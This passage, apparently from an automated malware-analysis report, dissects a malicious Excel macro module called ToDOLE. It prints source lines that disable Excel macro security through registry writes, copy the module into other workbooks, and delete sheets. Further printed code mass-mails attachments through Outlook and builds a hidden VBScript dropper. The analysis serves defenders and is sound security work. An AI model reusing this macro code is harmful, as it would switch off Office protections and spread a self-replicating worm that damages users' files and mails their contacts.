                                                                                                                                                    Exit For

                                                                                                                                                    599

                                                                                                                                                    Endif

                                                                                                                                                    600

                                                                                                                                                    Next

                                                                                                                                                    601

                                                                                                                                                    End Function

                                                                                                                                                    Subroutine

                                                                                                                                                    WRegAPIs: 3, Strings: 2, Number of lines: 10, Relevance: 14.01

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    CreateObject

                                                                                                                                                    		CreateObject("WScript.Shell")

                                                                                                                                                    RegWrite

                                                                                                                                                    RegWrite

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "WScript.Shell"
                                                                                                                                                    """"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    217

                                                                                                                                                    Sub WReg(strkey as String, Value as Variant, ValueType as String)

                                                                                                                                                    218

                                                                                                                                                    Dim oWshell

                                                                                                                                                    executed
                                                                                                                                                    219

                                                                                                                                                    Set oWshell = CreateObject("WScript.Shell")

                                                                                                                                                    CreateObject("WScript.Shell")

                                                                                                                                                    executed
                                                                                                                                                    220

                                                                                                                                                    If ValueType = "" Then

                                                                                                                                                    221

                                                                                                                                                    oWshell.RegWrite strkey, Value

                                                                                                                                                    RegWrite

                                                                                                                                                    222

                                                                                                                                                    Else

                                                                                                                                                    223

                                                                                                                                                    oWshell.RegWrite strkey, Value, ValueType

                                                                                                                                                    RegWrite

                                                                                                                                                    224

                                                                                                                                                    Endif

                                                                                                                                                    225

                                                                                                                                                    Set oWshell = Nothing

                                                                                                                                                    226

                                                                                                                                                    End Sub

                                                                                                                                                    Function

                                                                                                                                                    do_whatAPIs: 62, Strings: 0, Number of lines: 8, Relevance: 77.508

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    Application

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ActiveSheet

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: DisplayAlerts

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Visible

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: xlSheetVisible

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Range

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: InStr

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Value

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Delete

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function OpenDoor@ToDOLE: Version

                                                                                                                                                    Part of subcall function OpenDoor@ToDOLE: Application

                                                                                                                                                    Part of subcall function OpenDoor@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: FullName

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Path

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Close

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Shell

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: vbMinimizedFocus

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Shell

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: vbMinimizedFocus

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Shell

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: vbMinimizedFocus

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: Path

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: IsAddin

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: SaveCopyAs

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: IsAddin

                                                                                                                                                    Part of subcall function Microsofthobby@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: InStr

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: UCase

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: RegRead

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: Time

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T1

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T2

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T3

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T4

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: Time

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T2

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: DateAdd

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: T4

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: DateAdd

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: Now

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: CDate

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: Now

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: DateAdd

                                                                                                                                                    Part of subcall function ActionJudge@ToDOLE: Now

                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    50

                                                                                                                                                    Function do_what()

                                                                                                                                                    51

                                                                                                                                                    If ThisWorkbook.Path <> Application.StartupPath Then

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    Application

                                                                                                                                                    executed
                                                                                                                                                    52

                                                                                                                                                    RestoreAfterOpen

                                                                                                                                                    53

                                                                                                                                                    Call OpenDoor()

                                                                                                                                                    54

                                                                                                                                                    Call Microsofthobby()

                                                                                                                                                    55

                                                                                                                                                    Call ActionJudge()

                                                                                                                                                    56

                                                                                                                                                    Endif

                                                                                                                                                    57

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    copystartAPIs: 41, Strings: 2, Number of lines: 10, Relevance: 64.51

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Workbooks

                                                                                                                                                    VBProject

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Trim

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbNullString

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Protection

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbext_pp_locked

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Protection

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbext_pp_locked

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: VBComponents

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Number

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Err

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Environ

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Dir

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbNormal

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbHidden

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbSystem

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbNullString

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Clear

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Kill

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Number

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Err

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Item

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Clear

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: VBComponents

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Number

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Err

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Number

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Err

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Export

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: InStrRev

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: InStrRev

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Mid

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: VBComponents

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Import

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Type

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: vbext_ct_Document

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Import

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Lines

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: CodeModule

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Remove

                                                                                                                                                    Part of subcall function copymodule@ToDOLE: Kill

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "k4.xls"
                                                                                                                                                    "ToDole"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    58

                                                                                                                                                    Function copystart(ByVal wb as Workbook)

                                                                                                                                                    59

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    executed
                                                                                                                                                    61

                                                                                                                                                    Dim VBProj1 as VBIDE.VBProject

                                                                                                                                                    62

                                                                                                                                                    Dim VBProj2 as VBIDE.VBProject

                                                                                                                                                    63

                                                                                                                                                    Set VBProj1 = Workbooks("k4.xls").VBProject

                                                                                                                                                    Workbooks

                                                                                                                                                    64

                                                                                                                                                    Set VBProj2 = wb.VBProject

                                                                                                                                                    VBProject

                                                                                                                                                    66

                                                                                                                                                    If copymodule("ToDole", VBProj1, VBProj2, False) Then

                                                                                                                                                    66

                                                                                                                                                    Exit Function

                                                                                                                                                    66

                                                                                                                                                    Endif

                                                                                                                                                    67

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    OpenDoorAPIs: 15, Strings: 9, Number of lines: 18, Relevance: 43.768

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Version

                                                                                                                                                    Application

                                                                                                                                                    CreateObject

                                                                                                                                                    		CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

                                                                                                                                                    Part of subcall function WReg@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    Part of subcall function WReg@ToDOLE: RegWrite

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "scRiPTinG.fiLEsysTeMoBjEcT"
                                                                                                                                                    "HKEY_CURRENT_USER\Software\Microsoft\Office\"
                                                                                                                                                    "HKEY_CURRENT_USER\Software\Microsoft\Office\"
                                                                                                                                                    "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\"
                                                                                                                                                    "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\"
                                                                                                                                                    "REG_DWORD"
                                                                                                                                                    "REG_DWORD"
                                                                                                                                                    "REG_DWORD"
                                                                                                                                                    "REG_DWORD"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    194

                                                                                                                                                    Function OpenDoor()

                                                                                                                                                    195

                                                                                                                                                    Dim Fso, RK1 as String, RK2 as String, RK3 as String, RK4 as String

                                                                                                                                                    executed
                                                                                                                                                    196

                                                                                                                                                    Dim KValue1 as Variant, KValue2 as Variant

                                                                                                                                                    197

                                                                                                                                                    Dim VS as String

                                                                                                                                                    198

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    199

                                                                                                                                                    VS = Application.Version

                                                                                                                                                    Version

                                                                                                                                                    Application

                                                                                                                                                    200

                                                                                                                                                    Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

                                                                                                                                                    CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

                                                                                                                                                    executed
                                                                                                                                                    202

                                                                                                                                                    RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"

                                                                                                                                                    203

                                                                                                                                                    RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"

                                                                                                                                                    204

                                                                                                                                                    RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"

                                                                                                                                                    205

                                                                                                                                                    RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"

                                                                                                                                                    207

                                                                                                                                                    KValue1 = 1

                                                                                                                                                    208

                                                                                                                                                    KValue2 = 1

                                                                                                                                                    210

                                                                                                                                                    Call WReg(RK1, KValue1, "REG_DWORD")

                                                                                                                                                    211

                                                                                                                                                    Call WReg(RK2, KValue2, "REG_DWORD")

                                                                                                                                                    212

                                                                                                                                                    Call WReg(RK3, KValue1, "REG_DWORD")

                                                                                                                                                    213

                                                                                                                                                    Call WReg(RK4, KValue2, "REG_DWORD")

                                                                                                                                                    215

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    RestoreAfterOpenAPIs: 13, Strings: 5, Number of lines: 22, Relevance: 35.022

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Name

                                                                                                                                                    ActiveSheet

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    Sheets

                                                                                                                                                    Name

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVisible

                                                                                                                                                    Range

                                                                                                                                                    InStr

                                                                                                                                                    		InStr(,"CONFIDENTIAL") -> 0 InStr("TONGDA GROUP SHENZHEN & DONGGUAN INDUSTRIAL PARK ????????","CONFIDENTIAL") -> 0 InStr("? ? ? ? ? ? ?","CONFIDENTIAL") -> 0 InStr("????","CONFIDENTIAL") -> 0 InStr("UC EV Station US","CONFIDENTIAL") -> 0 InStr("P22056-1","CONFIDENTIAL") -> 0 InStr("????:","CONFIDENTIAL") -> 0 InStr("??","CONFIDENTIAL") -> 0 InStr("???","CONFIDENTIAL") -> 0 InStr("1*1","CONFIDENTIAL") -> 0 InStr("1?201070000363 ??:L1200*W1000MM\B33 5PCS 2?201080001145 ??:6??/T5*L1180*W330MM\??? 45PCS 3?201070001146 ??:16??/T5*L980*W330MM\??? 30PCS 4?201210000001 ??:L1200*1000*H150MM 1PCS","CONFIDENTIAL") -> 0 InStr("??(G)","CONFIDENTIAL") -> 0 InStr("73g/? ","CONFIDENTIAL") -> 0 InStr("C5","CONFIDENTIAL") -> 0 InStr("/","CONFIDENTIAL") -> 0 InStr(" ????","CONFIDENTIAL") -> 0 InStr("/ ","CONFIDENTIAL") -> 0 InStr("? ?","CONFIDENTIAL") -> 0 InStr("2?","CONFIDENTIAL") -> 0 InStr("8ZC5A7010100","CONFIDENTIAL") -> 0 InStr("75? ","CONFIDENTIAL") -> 0 InStr("PPS\A672GX01-TC154\??","CONFIDENTIAL") -> 0 InStr("230T","CONFIDENTIAL") -> 0 InStr("??HSF??","CONFIDENTIAL") -> 0 InStr("??/??/????/??/??/CNC/??","CONFIDENTIAL") -> 0 InStr("????????-????-???-????-??-??-??-???-?????-??-??","CONFIDENTIAL") -> 0 InStr("?????????:","CONFIDENTIAL") -> 0 InStr("1.??:?????????????????????????????? 2.????????????,??1????????,????OK??????????????? 3.????????????????,??????,???????? 4.?????,????????????,????????? ","CONFIDENTIAL") -> 0 InStr("1.????????????????????????????? 2.?????,???,?????????,???????,??????? 3.????:??????????????????????????????????????????????,??????? ","CONFIDENTIAL") -> 0

                                                                                                                                                    Value

                                                                                                                                                    Delete

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Macro1"
                                                                                                                                                    "Macro1"
                                                                                                                                                    "A1:F15"
                                                                                                                                                    "CONFIDENTIAL"
                                                                                                                                                    "CONFIDENTIAL"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    690

                                                                                                                                                    Private Function RestoreAfterOpen()

                                                                                                                                                    691

                                                                                                                                                    Dim sht, del_sht, rng, del_frag as Boolean

                                                                                                                                                    executed
                                                                                                                                                    692

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    693

                                                                                                                                                    del_sht = ActiveSheet.Name

                                                                                                                                                    Name

                                                                                                                                                    ActiveSheet

                                                                                                                                                    694

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    695

                                                                                                                                                    Application.DisplayAlerts = False

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    696

                                                                                                                                                    For Each sht in ThisWorkbook.Sheets

                                                                                                                                                    Sheets

                                                                                                                                                    697

                                                                                                                                                    If sht.Name <> "Macro1" Then

                                                                                                                                                    Name

                                                                                                                                                    697

                                                                                                                                                    sht.Visible = xlSheetVisible

                                                                                                                                                    Visible

                                                                                                                                                    xlSheetVisible

                                                                                                                                                    697

                                                                                                                                                    Endif

                                                                                                                                                    698

                                                                                                                                                    Next

                                                                                                                                                    Sheets

                                                                                                                                                    699

                                                                                                                                                    For Each rng in Sheets(del_sht).Range("A1:F15")

                                                                                                                                                    Range

                                                                                                                                                    700

                                                                                                                                                    If InStr(rng.Value, "CONFIDENTIAL") > 0 Then

                                                                                                                                                    InStr(,"CONFIDENTIAL") -> 0

                                                                                                                                                    Value

                                                                                                                                                    executed
                                                                                                                                                    701

                                                                                                                                                    del_frag = True

                                                                                                                                                    702

                                                                                                                                                    Exit For

                                                                                                                                                    703

                                                                                                                                                    Endif

                                                                                                                                                    704

                                                                                                                                                    Next

                                                                                                                                                    Range

                                                                                                                                                    705

                                                                                                                                                    If del_frag = True Then

                                                                                                                                                    705

                                                                                                                                                    Sheets(del_sht).Delete

                                                                                                                                                    Delete

                                                                                                                                                    705

                                                                                                                                                    Endif

                                                                                                                                                    706

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    708

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    WorkbookOpenAPIs: 2, Strings: 0, Number of lines: 9, Relevance: 2.509

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Len

                                                                                                                                                    Workbooks

                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    257

                                                                                                                                                    Private Function WorkbookOpen(WorkBookName as String) as Boolean

                                                                                                                                                    258

                                                                                                                                                    WorkbookOpen = False

                                                                                                                                                    executed
                                                                                                                                                    259

                                                                                                                                                    On Error Goto WorkBookNotOpen

                                                                                                                                                    260

                                                                                                                                                    If Len(Application.Workbooks(WorkBookName).Name) > 0 Then

                                                                                                                                                    Len

                                                                                                                                                    Workbooks

                                                                                                                                                    261

                                                                                                                                                    WorkbookOpen = True

                                                                                                                                                    262

                                                                                                                                                    Exit Function

                                                                                                                                                    263

                                                                                                                                                    Endif

                                                                                                                                                    263

                                                                                                                                                    WorkBookNotOpen:

                                                                                                                                                    265

                                                                                                                                                    End Function

                                                                                                                                                    Non-Executed Functions

                                                                                                                                                    Subroutine

                                                                                                                                                    CreatCab_SendMailAPIs: 126, Strings: 72, Number of lines: 94, Relevance: 348.344

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: Split

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: vbCrLf

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: Split

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: UBound

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: LBound

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: UBound

                                                                                                                                                    Part of subcall function get_ten_address@ToDOLE: CInt

                                                                                                                                                    CreateObject

                                                                                                                                                    CreateObject

                                                                                                                                                    Folderexists

                                                                                                                                                    CreateFolder

                                                                                                                                                    Replace

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    FreeFile

                                                                                                                                                    Open

                                                                                                                                                    Len

                                                                                                                                                    Path

                                                                                                                                                    FreeFile

                                                                                                                                                    Open

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: DisplayAlerts

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Names

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Visible

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Split

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Delete

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Visible

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: xlSheetVisible

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Delete

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Select

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Add

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Visible

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: xlSheetVeryHidden

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Int

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Rnd

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Int

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Rnd

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Chr

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Left

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Len

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Chr

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Left

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: Len

                                                                                                                                                    Part of subcall function RestoreBeforeSend@ToDOLE: ScreenUpdating

                                                                                                                                                    SaveCopyAs

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ActiveSheet

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: DisplayAlerts

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Sheets

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Name

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Visible

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: xlSheetVisible

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Range

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: InStr

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Value

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: Delete

                                                                                                                                                    Part of subcall function RestoreAfterOpen@ToDOLE: ScreenUpdating

                                                                                                                                                    CurDir

                                                                                                                                                    ChDrive

                                                                                                                                                    Left

                                                                                                                                                    Path

                                                                                                                                                    ChDir

                                                                                                                                                    Path

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    FileExists

                                                                                                                                                    Path

                                                                                                                                                    DoEvents

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    Folderexists

                                                                                                                                                    CreateFolder

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    ChDir

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: CreateItem

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: olMailItem

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Subject

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Body

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Email_Address

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: CC_email_add

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Add

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Attachment

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: display

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: Print

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: DoEvents

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: DoEvents

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: DoEvents

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: SendKeys

                                                                                                                                                    Part of subcall function Massive_SendMail@ToDOLE: DoEvents

                                                                                                                                                    vbCrLf

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "WScript.Shell"
                                                                                                                                                    "scripting.filesystemobject"
                                                                                                                                                    "E:\SORCE"
                                                                                                                                                    "E:\SORCE"
                                                                                                                                                    " "
                                                                                                                                                    "."
                                                                                                                                                    "_"
                                                                                                                                                    "*"
                                                                                                                                                    "E:\sorce\"
                                                                                                                                                    "Dim oexcel,owb, WshShell,Fso,Atta_xls,sh,route"
                                                                                                                                                    "On error Resume Next"
                                                                                                                                                    "Set sh=WScript.CreateObject(""""shell.application"""")"
                                                                                                                                                    "sh.MinimizeAll"
                                                                                                                                                    "Set sh = Nothing"
                                                                                                                                                    "Set Fso = CreateObject(""""Scripting.FileSystemObject"""")"
                                                                                                                                                    "Set WshShell = WScript.CreateObject(""""WScript.Shell"""")"
                                                                                                                                                    "If Fso.Folderexists(""""E:\KK"""") = False Then Fso.CreateFolder """"E:\KK"""
                                                                                                                                                    "Fso.CopyFile _"
                                                                                                                                                    "WshShell.CurrentDirectory & """"\"
                                                                                                                                                    "For Each Atta_xls In ListDir(""""E:\KK"""")"
                                                                                                                                                    " WshShell.Run """"expand """" & Atta_xls & """" -F:"
                                                                                                                                                    "Next"
                                                                                                                                                    "If Fso.FileExists(""""E:\KK\"
                                                                                                                                                    " route = WshShell.CurrentDirectory & """"\"
                                                                                                                                                    " if Fso.FileExists(WshShell.CurrentDirectory & """"\"
                                                                                                                                                    " route = InputBox(""""Warning! """" & Chr(10) & """"You are going to open a confidential file.""""& Chr(10) _"
                                                                                                                                                    " & """"Please input the complete file path."""" & Chr(10) & """"ex. C:\parth\confidential_file.xls"""", _"
                                                                                                                                                    " """"Open a File"""" , """"Please Input the Complete File Path"""", 10000, 8500)"
                                                                                                                                                    " End if"
                                                                                                                                                    "else"
                                                                                                                                                    " route = """"E:\KK\"
                                                                                                                                                    "End If"
                                                                                                                                                    " set oexcel=createobject(""""excel.application"""")"
                                                                                                                                                    " set owb=oexcel.workbooks.open(route)"
                                                                                                                                                    " oExcel.Visible = True"
                                                                                                                                                    "Set oExcel = Nothing"
                                                                                                                                                    "Set oWb = Nothing"
                                                                                                                                                    "Set WshShell = Nothing"
                                                                                                                                                    "Set Fso = Nothing"
                                                                                                                                                    "WScript.Quit"
                                                                                                                                                    "Private Function ListDir (ByVal Path)"
                                                                                                                                                    " Dim Filter, a, n, Folder, Files, File"
                                                                                                                                                    " ReDim a(10)"
